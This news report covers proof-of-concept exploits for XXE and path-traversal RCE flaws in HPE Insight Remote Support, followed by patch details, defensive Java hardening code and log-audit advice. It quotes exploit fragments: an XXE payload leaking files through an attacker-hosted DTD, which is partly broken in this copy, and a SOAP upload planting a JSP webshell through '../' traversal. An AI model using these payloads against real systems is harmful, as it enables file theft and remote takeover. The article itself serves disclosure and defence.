Security researchers have released proof-of-concept (PoC) exploit code for critical vulnerabilities in Hewlett Packard Enterprise's (HPE) Insight Remote Support (IRS) software, including an unauthenticated XML External Entity (XXE) injection flaw (CVE-2024-53675) and a path traversal-based remote code execution (RCE) vulnerability (CVE-2024-53676).
These flaws affect IRS versions prior to v7.14.0.629 and expose systems to arbitrary file disclosure and full SYSTEM-level command execution.
Technical Breakdown of Exploitation Chain
XXE Vulnerability in Device Registration Workflow (CVE-2024-53675)
The XXE vulnerability originates in the validateAgainstXSD method of HPE's ucacore library, which processes XML input during device registration without proper Document Type Definition (DTD) restrictions, according to a report published on GitHub.
Attackers can exploit this by injecting malicious XML entities into the
Below is an abridged PoC exploiting the XXE to exfiltrate the first line of C:\users\Administrator\Desktop\hello.txt:
http://www.hp.com/it/sa/reg/Registration/RegisterDevice
&callhome;]]>
The attacker-hosted malicious.dtd forces the XML parser to leak the file contents via an HTTP request:
">
%eval;
%exfiltrate;
Path Traversal to RCE (CVE-2024-53676)
The RCE vulnerability resides in the processAtatchmentDataStream method of the DataPackageReceiverWebSvcHelper class.
This function improperly validates the attachmentName parameter during file uploads to the /DataPackageReceiver/DataPackageReceiverService.svc endpoint, enabling directory traversal.
Attackers can upload malicious JSP files to arbitrary directories (e.g., Tomcat web roots) by crafting SOAP requests with ../ sequences:
xml_body = f"""
../../webapps/ROOT/shell.jsp
{base64.b64encode(malicious_jsp).decode()}
"""
The vulnerability stems from the unvalidated concatenation that builds attachmentFileLocation, allowing attackers to overwrite critical system files:
String attachmentFileLocation = attachmentFileDirectory + File.separatorChar + attachmentName; // attachmentName is used as-is, so "../" segments are honoured
File file = new File(attachmentFileLocation);
file.createNewFile(); // Writes attacker-controlled content to arbitrary paths
While the XXE exploit reliably leaks first-line file contents, the researchers noted limitations in retrieving multi-line files due to parser constraints.
The RCE exploit, however, faces a critical dependency: successful exploitation requires a valid oosId (device registration token) and registrationToken, which attackers must obtain through other means (e.g., brute-forcing or leveraging the XXE to steal tokens).
In lab environments, unregistered devices triggered errors that halted attachment processing:
[ERROR] DataPackageReceiverWebSvcHelper: This device (oosId: 93f6…e39) is not found…aborted processing.
Despite this, attackers with valid credentials (e.g., compromised partner accounts) could chain both vulnerabilities to:
- Steal oosId/registrationToken via XXE
- Upload JSP webshells via RCE
Mitigation and Patch Status
HPE addressed both issues in IRS v7.14.0.629 through:
- Disabling DTD processing in XML validators
- Implementing input sanitization for attachmentName parameters
- Adding authentication checks for device registration workflows
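The following Java example is added here to show what the first two fixes look like in practice; it is illustrative code written for this page, not HPE's patch or the ucacore source. It assumes a hypothetical class IrsHardeningExample and an attachment directory named attachments. The parser factory rejects any DOCTYPE declaration (which is where an entity such as the callhome one above would have to be declared) and disables external entity and DTD loading as a second line of defence; the path helper replaces the unchecked concatenation quoted above with a denylist plus a canonical-path containment check.

```java
import java.io.ByteArrayInputStream;
import java.io.File;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.nio.file.Path;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.xml.sax.SAXException;

// Hypothetical class added for this page; not part of HPE IRS or ucacore.
public class IrsHardeningExample {

    // Hardened XML parser: no DOCTYPE at all, so no entity declarations;
    // external entity and DTD fetches are switched off as defence in depth.
    static DocumentBuilder secureBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f.newDocumentBuilder();
    }

    // Replacement for "attachmentFileDirectory + File.separatorChar + attachmentName":
    // reject path separators and ".." outright, then normalise and confirm the
    // resolved path is still inside the attachment directory.
    static File resolveAttachment(File attachmentFileDirectory, String attachmentName) throws IOException {
        if (attachmentName == null || attachmentName.isEmpty()
                || attachmentName.contains("/") || attachmentName.contains("\\")
                || attachmentName.contains("..")) {
            throw new IOException("rejected attachment name: " + attachmentName);
        }
        Path base = attachmentFileDirectory.toPath().toAbsolutePath().normalize();
        Path target = base.resolve(attachmentName).normalize();
        if (!target.startsWith(base)) { // catches anything the denylist missed
            throw new IOException("attachment escapes directory: " + attachmentName);
        }
        return target.toFile();
    }

    public static void main(String[] args) throws Exception {
        File dir = new File("attachments"); // hypothetical attachment directory

        System.out.println("accepted: " + resolveAttachment(dir, "report.xml"));
        try {
            // same traversal shape as the PoC's attachmentName
            resolveAttachment(dir, "../../webapps/ROOT/shell.jsp");
        } catch (IOException e) {
            System.out.println("blocked: " + e.getMessage());
        }

        // A constructed document with an internal DTD: the hardened parser refuses it
        // before any entity is ever resolved.
        String doc = "<?xml version=\"1.0\"?><!DOCTYPE x [<!ENTITY e \"test\">]><x>&e;</x>";
        try {
            secureBuilder().parse(new ByteArrayInputStream(doc.getBytes(StandardCharsets.UTF_8)));
            System.out.println("parsed (unexpected)");
        } catch (SAXException e) {
            System.out.println("DOCTYPE rejected: " + e.getMessage());
        }
    }
}
```

The denylist alone would be enough for the traversal string shown in the PoC, but the containment check is kept because it also covers encodings and platform-specific separators that a string match may miss; likewise, disallowing DOCTYPE is the one setting that makes the other XXE features redundant, and they are left on only so that a later parser change cannot silently reopen the hole.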
Organizations using IRS should immediately upgrade to the patched version and audit logs for suspicious SOAP requests to the /DeviceRegistration or /DataPackageReceiver endpoints.
Network defenders can also block external access to these paths if HPE IRS operates in an internal-only capacity.